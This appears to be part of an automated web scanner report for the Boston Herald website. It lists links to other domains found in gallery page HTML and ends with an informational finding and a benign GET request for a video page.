<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4856','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110122/stp/03331b_012111hockeyce005.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4855','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110122/stp/3ab710_012111celticssc02.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4848','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110121/stp/830e10_012011bruinsms02.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4846','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110120/stp/fcbae7_011911celticsms04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4845','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110119/stp/7c5708_011911soxnl10.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Red Sox Rookie Program at BC"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Red Sox Rookie Program at BC">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4843','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110118/stp/022de6_011711celticsce030.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4841','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110117/stp/95be5a_011711bruinsnl20.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4831','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110116/stp/54c191_Seahawks_Bears_Football__trose@heraldinteractive.com_24.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4829','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110115/stp/fed6dc_APTOPIX_Ravens_Steelers_Football__trose@heraldinteractive.com_15.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4828','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110115/stp/92b48a_011511bruinsjw02.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4826','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110115/stp/c33a6c_011411celticssc15.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4825','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110115/stp/9da8b3_011411patstf18.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4819','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110114/stp/603f10_011311patsmw05.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4818','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110114/stp/de77f1_011311bruinsms07.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4812','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110112/stp/be66c8_011211celticsms04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4808','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110112/stp/2a53c5_PatsFansB011211.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4805','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110112/stp/e563d8_011111bruinsmw04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4801','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110111/stp/440065_011111patsjw04.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4799','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110111/stp/c17ee9_011011celtsmw006.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4792','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110108/stp/f40e45_010711celticssc13.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4791','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110108/stp/fad0b9_010611crawfordnl02.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Carl Crawford works out in Houston"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Carl Crawford works out in Houston">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4789','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110107/stp/f1d006_010511crawfordnl12.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\At home with Carl Crawford"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\At home with Carl Crawford">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4785','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110106/stp/11080d_010511celticsms05.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4777','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110104/stp/ee1234_010311celtsmw021.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4774','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110102/stp/940585_010211pats027.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4772','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/d1d0a1_123110patriotsDR03.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4770','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/467227_123110celticsmh15.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4763','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/a92882_123010bchoopsms05A.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Boston College beats Northeastern 80-67"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Boston College beats Northeastern 80-67">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4761','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/5d7332_123010patsjw09.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4866','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110125/stp/61e5f9_tgrit.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4859','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110123/stp/873e80_012211caesarap09.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4847','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110120/stp/ef8a2d_KateA012011.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4832','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110116/stp/e02b29_460f81914ea92f01e20e6a7067008cba.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4810','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110112/stp/e9644b_fash2.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Patriot fashion"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Patriot fashion">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4786','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110106/stp/c846a1_010511cirquear01.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Cirque du Soleil"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Cirque du Soleil">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4783','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110105/stp/4df46a_010311skating03.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Fashion on ice"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Fashion on ice">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4767','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/2d898c_120810princessnl05.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\2010 in pictures"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\2010 in pictures">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4879','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/ed2891_012711hastynl05.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Hasty Pudding"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Hasty Pudding">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4873','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110127/stp/ecbe1f_012610nkotbar04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\New Kids raid Fenway"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\New Kids raid Fenway">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4849','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110121/stp/1a0e4b_012011celtsnl03.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Paul Pierce reads to students"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Paul Pierce reads to students">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4794','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110109/stp/d94239_010711folkap02.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4766','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/d99d87_123110firstnightsc04.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\First Night 2011"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\First Night 2011">Purchase</a>
...[SNIP]...
<div class="gutter_teaseInner" style="padding: 0px; padding-bottom:10px;" >

<img width="100%" src="http://multimedia.heraldinteractive.com/images/20110127/3057c6_Plow_01282011.jpg" />

<div style="padding: 0px 10px 0px 10px;">
...[SNIP]...
<p><a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/photo/?photo_name=3057c6_Plow_01282011" ><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mediacenter/btn_order_prints_yellow.png" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<li>
<a href="http://gallery.pictopia.com/bostonherald/"><h3>
...[SNIP]...
<div class="gutter_teaseInner">
<a href="http://gallery.pictopia.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/purchasePhotos.gif" /></a>
...[SNIP]...
<br />
<a href="http://gallery.pictopia.com/bostonherald/">Click here</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</body>


       <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

7.13. http://www.bostonherald.com/mediacenter/video.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
